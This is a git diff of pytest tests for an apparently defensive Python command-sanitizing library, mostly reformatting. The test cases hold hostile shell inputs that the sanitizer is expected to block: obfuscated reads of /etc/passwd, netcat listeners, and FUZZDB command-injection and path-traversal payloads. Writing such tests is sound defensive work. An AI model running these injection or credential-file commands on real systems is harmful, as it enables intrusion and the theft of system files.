$HOME/{file1.txt,file2.txt,${BADKEY:=file3.txt},${BADKEY:+file4.txt}}", + "/Users/TESTHOME/file1.txt /Users/TESTHOME/file2.txt /Users/TESTHOME/file3.txt /Users/TESTHOME/file4.txt", + {"shell": True, "env": {"HOME": "/Users/TESTHOME"}}, + ), + ( + ["-c", 'cat /{junk1,"${TEST:1:2}${TEST:0:1}"}c/p*sswd'], + EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], + {"shell": False, "executable": "bash", "env": {"TEST": "test"}}, + ), + # path resolution should be based on env variables + ("which ls", which("ls"), {"shell": True}), + ("which ls", "", {"shell": True, "env": {"PATH": ""}}), + ( + "(sh)<<<'{nc,-l,-p,4444}'", + EXCEPTIONS["PREVENT_COMMON_EXPLOIT_EXECUTABLES"], + {"shell": True}, + ), + # No exception should be raised here becuase when env PATH is set to empty string, the executables can't be found + ("(sh)<<<'{nc,-l,-p,4444}'", "", {"shell": True, "env": {"PATH": ""}}), + ], ) def test_popen_kwargs(self, command, expected_result, popen_kwargs, original_func): if original_func.__name__ == "call": # call doesn't have capture_output kwarg so can't compare result and easier to just return than refactor - return - + return + restrictions = [ - "PREVENT_COMMAND_CHAINING", + "PREVENT_COMMAND_CHAINING", "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES", - "PREVENT_COMMON_EXPLOIT_EXECUTABLES", + "PREVENT_COMMON_EXPLOIT_EXECUTABLES", ] - self._run_test_with_command(command, expected_result, restrictions, original_func, **popen_kwargs) - + self._run_test_with_command( + command, expected_result, restrictions, original_func, **popen_kwargs + ) # FUZZDB tests @pytest.mark.parametrize( "command", - [payload.replace('{cmd}', command) for command in [ - "cat /etc/passwd", - "curl https://example.com", - "sh -c 'curl https://example.com'", - "find . -name '*' -exec curl '{}' '+'", - "nc -l -p 1234", - ] for payload in FUZZDB_OS_COMMAND_INJECTION_PAYLOADS] + [ + payload.replace("{cmd}", command) + for command in [ + "cat /etc/passwd", + "curl https://example.com", + "sh -c 'curl https://example.com'", + "find . -name '*' -exec curl '{}' '+'", + "nc -l -p 1234", + ] + for payload in FUZZDB_OS_COMMAND_INJECTION_PAYLOADS + ], ) def test_fuzzdb_injection_payloads(self, command, original_func): restrictions = [ - "PREVENT_COMMAND_CHAINING", + "PREVENT_COMMAND_CHAINING", "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES", - "PREVENT_COMMON_EXPLOIT_EXECUTABLES", + "PREVENT_COMMON_EXPLOIT_EXECUTABLES", ] - self._run_test_with_command(command, EXCEPTIONS["ANY"], restrictions, original_func) - + self._run_test_with_command( + command, EXCEPTIONS["ANY"], restrictions, original_func + ) @pytest.mark.parametrize( "filepath", - [payload.replace('{FILE}', file) for file in [ - "/etc/passwd", - "/etc/passwd*", - "/etc/pass*d", - "*/etc/pass*d", - "/et**/pa*sswd", - - "etc/passwd", - "etc/passwd*", - "etc/pass*d", - "*etc/pass*d", - "et**/pa*sswd", - ] for payload in FUZZDB_PATH_TRAVERSAL_PAYLOADS] + [ + payload.replace("{FILE}", file) + for file in [ + "/etc/passwd", + "/etc/passwd*", + "/etc/pass*d", + "*/etc/pass*d", + "/et**/pa*sswd", + "etc/passwd", + "etc/passwd*", + "etc/pass*d", + "*etc/pass*d", + "et**/pa*sswd", + ] + for payload in FUZZDB_PATH_TRAVERSAL_PAYLOADS + ], ) - def test_fuzzdb_traversal_payloads(self, filepath, original_func): + def test_fuzzdb_traversal_payloads(self, filepath, original_func): restrictions = [ "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES", ] - try: if original_func.__name__ == "run": popen_kwargs = {"capture_output": True, "text": True} @@ -693,16 +835,16 @@ def test_fuzzdb_traversal_payloads(self, filepath, original_func): command = f"cat {filepath}" result = safe_command.run( - original_func=original_func, - command=command, - restrictions=restrictions, - shell=True, - **popen_kwargs + original_func=original_func, + command=command, + restrictions=restrictions, + shell=True, + **popen_kwargs, ) # Anything that is allowed to run is a junk path that does not resolve to /etc/passwd # and should thus not be blocked by PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES if original_func.__name__ == "run": - assert "root:" not in result.stdout + assert "root:" not in result.stdout else: assert result != 0 except (SecurityException, OSError) as e: @@ -710,5 +852,3 @@ def test_fuzzdb_traversal_payloads(self, filepath, original_func): assert e.args[0].startswith("Disallowed access to sensitive file") elif isinstance(e, OSError): assert e.strerror == "File name too long" - - diff --git a/tests/safe_requests/test_api.py b/tests/safe_requests/test_api.py index ae156b4..95480da 100644 --- a/tests/safe_requests/test_api.py +++ b/tests/safe_requests/test_api.py @@ -1,10 +1,17 @@ import pytest + from security.exceptions import SecurityException from security.safe_requests import get, post from security.safe_requests.host_validators import DefaultHostValidator -@pytest.mark.parametrize("method_name", [get, post]) +@pytest.mark.parametrize( + "method_name", + [ + get, + post, + ], +) class TestSafeRequestApi: @pytest.mark.parametrize("protocol", ["http", "https"]) def test_url_default_safe_protocols(self, protocol, method_name):